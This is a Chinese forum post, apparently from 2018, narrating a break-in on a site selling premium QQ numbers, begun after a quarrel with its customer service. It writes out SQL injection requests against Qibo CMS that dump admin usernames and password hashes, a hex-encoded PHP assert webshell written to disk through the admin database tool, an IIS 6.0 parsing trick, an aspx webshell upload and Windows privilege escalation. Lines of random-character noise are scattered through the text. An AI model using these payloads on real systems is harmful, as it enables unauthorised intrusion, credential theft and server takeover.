|
' j7 u# U& e1 U9 N
. v: K h: k9 ]# U9 i2 S+ ~2 f3 C) z % ?( D9 B' r" i3 R
% y" R# |9 T( F% I% X/ E3 {
一、踩点寻找漏洞
2 r2 s# U9 C4 s9 _6 _4 z8 y4 m闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
, n- Q( C& }! |) c4 L
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
6 u5 ]3 c4 D# q+ I( P3 L
先注册一个用户,记住注册时候的邮箱以uid号,
& u) V' `1 J3 w, R- Q$ ]
4 W: i2 G5 r# T/ l! P
) D3 @. e% S O( f% `( M然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
/ _( o+ `8 L; b# Z& L/ c+ V. j
z' `% q' ^# n K* x
truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=,address=(select user()) where uid=3%23
2 C# `0 c% a* q3 S
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
2 u! I& m# W3 I* s
* J; ]8 @' t, ^+ g
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&[email protected]&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
9 I1 H* p2 M6 a. T
: E+ k5 w: {& j3 o( C
2 @6 L2 r7 r, [8 E: J' m& O
解密进后台如图:
8 J, B# N+ M/ e4 H$ e6 @
4 v, d6 _) U- z
( V/ P& o/ |# e' J2 W( F9 f
) a1 M/ G; P) c1 O# U# j9 [二、后台getwebshell
: Z; t ~! T+ }, G3 k$ {: q
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
) {1 t- J, }& A, [7 M4 |
H ]8 z; U: F& G) x/ O4 }3 i$ X9 O( n
* _3 w$ G* F% g: @0 S$ D& @4 x
5 o3 U; r3 g! ]) k: R! p: k然后点确定,添加提示
+ B1 C$ U, Q* ^. u* f; E' u
+ R5 X/ u' t/ f0 m- f, H
2 V% H9 V) v3 r" P* Y
! k- M+ Y0 C9 J/ v/ O _由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
% B/ G( M& B5 _4 y" Q. C: r% ]! q- W$ h
( h: N; O. @6 Y3 Y- m- Y; q
; _: |7 ]( Q# x8 u8 a. H
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
4 f6 J0 o s! E/ p8 p' e
如图:
+ ^- X% Z, V( m$ ^- x, v
- A: [5 b/ D6 m' O3 m& G
8 i! t+ ]6 W8 t6 J; I$ P
3 K2 }# H& }+ O! _7 M
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
& c" G" {8 v+ I# F
7 f3 e, L' T- p
8 w1 r, e7 ]- [
- V+ O; r" g( J- |& ^" e三、提权进服务器
( U x# L4 e+ ~- x经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
/ W/ h% |0 z7 d. _
- ~! c. ]" s) z
; q- @# E# Z6 P( H6 z7 H/ S啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
: Y7 |$ j3 C% B: D/ A! f
2 g) ?. |3 l* s4 s7 V/ A/ O
9 s/ X* x0 K) _8 v0 S/ s然后登陆服务器如图:
- x. Z- R+ R2 N* ~$ }
* X/ B) V: f# ?5 D6 Z1 S
. x; h- C, I& U0 L8 @" E9 U; C % A; V# q" f9 i* V
2 w2 @/ ~- O+ c% j3 L% S1 b
3 M" c# s' I+ l
难怪普通刀连接不上,原来是有狗。
9 n$ W: H; O' Z6 N) j
& \) C+ b. A: [' o0 S# i/ ^
+ p) Y& o" k$ f* F$ H$ I ; _9 \# f, l3 Z, M) N( U4 `; I/ o
/ L" x) J7 j& j& \5 j: Z6 k
% w2 h& n: X. |' a' c2 A8 u7 ]
0 Y7 \6 P% T( _- c: [2 y | 
发表于 2018-10-20 20:08:47
收藏
分享
支持
反对